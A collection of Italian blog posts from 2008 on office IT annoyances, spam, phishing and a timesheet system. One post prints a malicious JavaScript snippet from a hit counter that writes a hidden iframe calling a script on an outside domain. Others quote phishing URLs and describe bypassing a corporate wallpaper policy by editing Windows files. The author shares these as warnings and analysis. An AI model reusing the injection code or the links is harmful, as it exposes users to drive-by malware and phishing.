Come ho già scritto, il mio pc aziendale è gestito remotamente. Nulla di male in generale. Però tra le policy di dominio, su cui io non posso fare nulla pur avendo i diritti di amministratore, c’è anche quella sullo sfondo del PC. Fino alla scorsa settimana, avevo perlomento la possibilità di non avere uno sfondo, ma semplicemente un colore uniforme, e mi accontentavo. Ma lunedì, in un tentativo da remoto per permettermi di accedere alla posta aziendale all’avvio del pc – non che ci siano riusciti, ma visto che poi ho scoperto che la colpa è di ZoneAlarm che blocca non riesco a capire quale processo, e visto che io ufficialmente non dovrei avere un firewall aggiuntivo, me lo tengo così – sono stato forzato ad avere lo Sfondo Telecom Ufficiale, con una bella barra rossa in cima comprendente il logo e un disegno in mezzo che non mi fa più distinguere le icone.
A questo punto mi sono scocciato. Sono andato su C:/WINDOWS e come prima cosa ho sostituito il file NewSfondo.jpg con l’immagine che volevo io (la foto della blogosfera che era uscita a suo tempo su Nòva : tranne che al centro è praticamente tutta nera, l’ideale). Togliere la barra è stato un po’ più complicato: alla fine ho scoperto che il colpevole era il file desk.htm, sempre nella directory di Windows, che è stato pertanto opportunamente modificato.
A parte queste operazioni illegali che ho compiuto, capisco che forse lo sfondo uniforme è stato pensato per le segretarie, e che le segretarie probabilmente non si darebbero la pena di fare tutte queste modifiche (a parte che mi sa che non abbiano nemmeno i diritti di accesso a quei file). Però qual è la vera ragione logica di avere una policy per gli sfondi? Fanno forse male a qualcuno?
Aggiornamento: (12:30) tra le altre “novità” dopo l’intervento remoto c’è stata la modifica della home page di Internet Explorer (che avevo settato ad http://localhost/) Cosa c’è adesso? Il sito Telecom? l’intranet? No. http://it.msn.com/. Giusto per dire come sono fatte le policy aziendali.

Ultimo aggiornamento: 2008-05-27 10:35

Stasera, mentre aspettavo che il diluvio su Milano scemasse un po’ per tornare a casa, mi sono accorto che se cliccavo su un’icona nella barra Quick Launch (come si dice in italiano? Esecuzione rapida?) del pc dell’ufficio non succedeva nulla. Se però aprivo la cartella Quick Launch, da lì i programmi partivano. Vabbè, ho pensato, poco male, tanto poi lo spengo e domani mattina si vedrà.
Torno a casa, e Anna era sul mio PC. Dopo un po’ mi chiama dicendo “non riesco a far partire Firefox dall’iconcina!” Stava succedendo esattamente la stessa cosa. (Per la cronaca, adesso ho ammazzato e fatto ripartire explorer.exe e il tutto sembra a posto).
Cos’è? il 22 maggio è la Giornata In Cui XP Ha Più Paturnie Del Solito?

Ultimo aggiornamento: 2008-05-22 19:55

Paolo Beneforti potrà finalmente vedere che non ce l’ho solo con Repubblica.it. Il Corsera ha appena pubblicato questo articolo, scopiazzat^W tratto da Wired (a onor del vero, il link ce l’hanno messo), dove si parla della prima calcolatrice meccanica in grado di fare moltiplicazioni, e si termina con la frase «Nel 1972, grazie al contributo di queste (e altre) grandi intuizioni, nascerà poi la Datamah, la prima calcolatrice tascabile prodotta da Texas Instruments.».
Ok, la serie di calcolatrici sarebbe la Datamath, ma bisogna dire che la traduttrice ha fatto una ricerchina, visto che il nome non c’era nell’articolo ufficiale. L’errore di battitura non lo computo certo. Il fatto è che se Wired ha deciso di fare una marchetta a TI, non è bello copiarla: la prima calcolatrice elettronica tascabile è stata la HP35 (vedi anche qua). Mi sa tanto che la signora Di Pasqua ai tempi non era ancora nata :-)

Ultimo aggiornamento: 2008-05-07 21:42

Inizio con una notizia di servizio, anche se probabilmente inutile visto che i miei lettori sono italianofili. Se vi arriva un mail scritto in portoghese/brasiliano dal titolo Telegrama Urgente!, non cliccate sopra il Telegrama, anche perché il file index.php invia immediatamente uno .scr che è il troiano Mal.Banker.
Aggiungo poi che l’ultimo phishing sulle Poste Italiane non è nulla di particolare, se non per l’indirizzo di invio che è posTTe.it, probabilmente la versione finnica; altrimenti le Poste ItaliEne sono sempre una sicurezza.
Ma la parte più divertente è sicuramente lo spam dei riciclatori russi di denaro dalla provenienza non ben determinata. ll messaggio, che mi è arrivato sulla casella di posta aziendale subito prima delle scuse di Luca Luciani (non credo però ci sia una correlazione) era scritto centrato come una poesia sperimentale anni ’60 e il traduttore automatico aveva fatto del suo meglio per generare del lirismo degno di ben altri scritti. Vi lascio alcune chicche per farvi iniziare meglio la giornata:
– Noi siamo la società sviluppata con il ricco di movimento nel campo di finanzaria!
– Per rafforzare la nostra società noi stiamo cercando dei professioniste [però il femminile genera qualche equivoco…]
– Le suggeriamo del stipendio quello dipende da volume del vostro lavoro
Ma il meglio è alla fine, quando mi viene detto a quale indirizzo scrivere per “chiedere le dettagli oppure fare le domande”: la frase inizia con “Se Lei è interessante”. Sono già tagliato fuori in partenza.

Ultimo aggiornamento: 2008-04-07 10:32

Domenica avevo scritto a proposito dei troiani che cercavano di intrufolarsi sul mio povero PC mentre navigavo sulle pagine di splinder. Oggi pomeriggio, mentre guardavo che succedeva da Copiascolla, mi sono visto in diretta il troiano che voleva cambiare la mia homepage (come se io non usassi SpyBot e TeaTimer per bloccare simili richieste :-) ) Mi sono messo a dare un’occhiata a quale parte del codice inserisse il tutto: dopo avere benedetto il fatto che Firefox ti permette di scrivere view-source: e visualizzare il sorgente di una pagina web invece che la pagina stessa, ho scoperto che il colpevole era il contatore delle statistiche. Se uno guarda http://stat.superstat.info/counter.php, o almeno lo guardava quando ho provato io, avrebbe trovato questo simpatico pezzo di codice:
if ( parseInt(pr17) <= parseInt("9") && parseInt(visit17) < 2 ) {
document.write('<div style="position:absolute;left:-5000px;top:-5000px;visibility:hidden;">');
document.write('<if'+'rame frameborder="0" src="http://a1p.cgste2.won-ppp.info/htm/cc1.php?p=55&cc2=it"><'+'/iframe>' );
document.write('</div>');
};
Ho già detto che io JavaScript non lo parlo, ma credo che sia abbastanza chiaro che viene aperto un iframe che chiama appunto uno script su won-ppp.info. Ho provato a guardare le informazioni di whois per superstat.info, e ho visto che il dominio è “nascosto”, o meglio registrato da domainsbyproxy.com, che afferma di essere un utile servizio perché i dati pubblici dei dominii non siano preda di spammer ma a me sembra più un sistema perché non si sappiano i dati degli spammer. L’ultimo aggiornamento del record è dello scorso ottobre: visto che Gaia mi ha detto che quel contatore ce l’ha da almeno un anno, non penso sia impossibile che il dominio sia scaduto e sia stato preso da qualcuno che usi il servizio come copertura – sì, lo so, fa tanto James Bond o il negozio di fiori dei vecchi Alan Ford, ma che ci volete fare?
Vabbè, se non avete capito nulla del pippone non è importante, visto che quello che conta :-) è solo quest’ultima riga. Se avete un contatore su superstat.info, toglietelo subito.

Ultimo aggiornamento: 2008-03-26 15:51

In un post su neverendingbooks che parlava di tutt’altro, ho scoperto l’esistenza di questo sistema di crittografia, che è stato indubbiamente generato da una mente malata. L’idea di base del sistema è che per crittare un testo (in maniera standard, intendo) occorre ovviamente il testo da crittare, ma anche una chiave. Nel sistema di Rod McFarland, la chiave è il contenuto di un URL (nascosta all’interno del testo crittato). Questo significa che basta che il contenuto della pagina cambi, e non è più possibile tornare al contenuto iniziale[*]. La cosa diventa divertente, come nel caso di neverendingbooks, quando la pagina utilizzata per crittare è una come isitfriday; in pratica si può leggere il post solamente di venerdì. Qualche info in più la trovate qua.
[*] in realtà credo che siano possibili degli attacchi basati sul fatto che il testo usato per crittare non è statisticamente casuale, ma non stiamo a sottilizzare.

Ultimo aggiornamento: 2008-02-29 12:14

L’idea del messaggio minimale praticamente solo con un link non era in realtà male, anche se forse rovinata dal testo che diceva:
 
     Banca di Roma - Cliente Messaggio.
     VAI AL MIO MESSAGGIO Clicca qui
 
(il “qui”, per i curiosi, era http://campusvirtual.caschile.cl/claroline/auth/extauth/drivers/main.html il quale a sua volta rimandava a un indirizzo che inizia con http://www.cologne-fight-crew.de/vwar/upload/a.php? e continua con la stringa %1%2%3%24%42%32%62%13%76%81%37 ripetuta sei volte di fila. Ci deve essere sicuramente un significato esoterico che mi sfugge)
Il tutto però è rovinato dal titolo del messaggio: Phishing: Banca di Roma – Cliente Messaggio.
La cosa più strana è che firefox non sapeva ancora che il sito tedesco era farlocco. O sto diventando molto più veloce a fare le prove, oppure la gente si è scocciata di segnalarli, il che potrebbe anche non essere male in un tentativo di evoluzione genetica dell’intelligenza del genere umano.

Ultimo aggiornamento: 2008-02-27 14:29

Nella simpatica azienda in cui lavoro, come penso in quasi tutte le aziende con più di due addetti, vige l’abitudine di dovere preparare un foglio in cui si indica su cosa si è lavorato: in questo modo qualche consulente può preparare delle bellissime statistiche, che qualche capetto può orgogliosamente mostrare ai caponi. Naturalmente non è possibile mantenere sempre e solo lo stesso sistema per fare la rendicantazione, perché dopo un po’ anche i caponi si accorgono che c’è qualcosa di strano, e i consulenti non hanno più lavoro. Così anche quest’anno il sistema è cambiato, e finalmente ieri mi è stata data la possibilità di spiegare cosa ho fatto da Capodanno in poi. Ecco qua così una recensione che vi racconta quello che devo fare…
Per prima cosa bisogna aprire il browser e andare su un sito. Per ragioni di sicurezza, al sito non è stato dato un nome ma solo un indirizzo ip. Da lì metti il tuo identificativo (il numero di matricole) e la tua password (il numero di matricola, per ragioni di sicurezza) e finalmente ti appare la schermata iniziale: un form con gli spazi per scrivere cognome e nome e i campi per indicare giorno mese e anno. Un utonto qualsiasi scriverebbe cognome e nome, e magari si chiederebbe perché il sistema non glieli ha già messi: anche quella è probabilmente una procedura di sicurezza. Quello che bisogna fare è selezionare la data per cui si vuole fare la rendicontazione, e poi cliccare su un’iconcina con una lente, nascosta in alto a destra. In questo modo appare come per magia una riga con il proprio nome e cognome, e un’altra iconcina, stavolta a forma di floppy, su cui cliccare.
Finalmente arriva la schermata con i dati, e il primo messaggio automatico di errore: Matricola xxxxxx per il ggmmaaaa non e' stata schedulata. Scegliere un nuovo turno.. C’è un misero singolo campo in cui bisogna indicare il codice del “turno”: dal lunedì al venerdì si scrive 451 (Fahrenheit?), il sabato 57 e la domenica 61. Sì, il sistema non si fida di calcolare automaticamente qual è il giorno della settimana: metti che nel corso della sua validità si faccia una riforma del calendario… sarebbe tutto da buttare, no?
Si conferma il dato, e compare il secondo messaggio automatico di errore: Quadratura non Ok. Il sabato e la domenica non ci sono grossi problemi: basta ricliccare su “conferma”, partendo dal principio che uno può cliccare per sbaglio una volta, ma se lo fa due volte o è un idiota o vuole proprio fare così. A questo punto si può tornare indietro, riselezionare una data, ricliccare sull’icona con la lente e poi sull’icona con il floppino, che sembra assolutamente identica a prima ma si è magicamente settata per la nuova data.
Nei giorni in cui si doveva effettivamente lavorare, la procedura è un po’ più complicata. Io faccio una sola timbratura al giorno, quindi significa che tutti i giorni convenzionalmente lavoro per sette ore e trentotto minuti: ergo c’è uno dei millanta campi che sono apparsi come per magia dove devo scrivere “0738”. Ma poi devo indicare su cosa avrei lavorato: c’è un altro apposito campo, “Codice Lavoro”. Anzi no, ce ne sono due: quello giusto mi hanno detto che è “Dati relativi ad attività Artemis”, e non quello “Dati relativi alle Indisponibilita” (senza accento, sì). Per nostra comodità sono già indicati tutti i codici possibili di attività, preparati addirittura con quello che ha tutta l’aria di essere un carattere di controllo al loro interno (si sa, scegliendo da un elenco predefinito potresti sbagliarti). Ovviamente tu non sei costretto a sapere a memoria qual è il codice per il tuo lavoro, e si può cliccare su un bottoncino per vedere la lista: per favorire l’usabilità, il bottoncino è contrassegnato da una “X”, che quindi non sta per “chiudi”, ma per “eXcellent, my dear Watson!” Se fai un’assenza, però, non c’è l’aiutino: devi andare a caccia di un file, gestito religiosamente da Chi Conosce Il Sistema, con tutte le sigle. Epperò non ci credete, ma confermando il dato funziona tutto!
PS: bisogna però essere onesti. Per il futuro, uno può già schedulare il proprio lavoro, e spiegare al sistema quali giorni sono lavorativi e quali no. L’unico problema è naturalmente che devi ricordarti di delezionare i giorni già selezionati: la bilocazione gliela lasciamo a Padre Pio.
PPS: l’avrete già immaginato tutti: sono ventun anni e rotti che devo fare una rendicontazione, e sono ventun anni e rotti che la correlazione tra quanto scritto e quanto fatto è nella migliore delle ipotesi nulla.
PS3: In questo momento non posso collegarmi al sistema, perché mi dice Utente non riconosciuto: User 'xxxxxx' already Logged. Ma se cerco di inserire i dati, mi cazzia con Utente non autenticato! Vai alla pagina di login. Perfetto, no/

Ultimo aggiornamento: 2008-02-21 10:34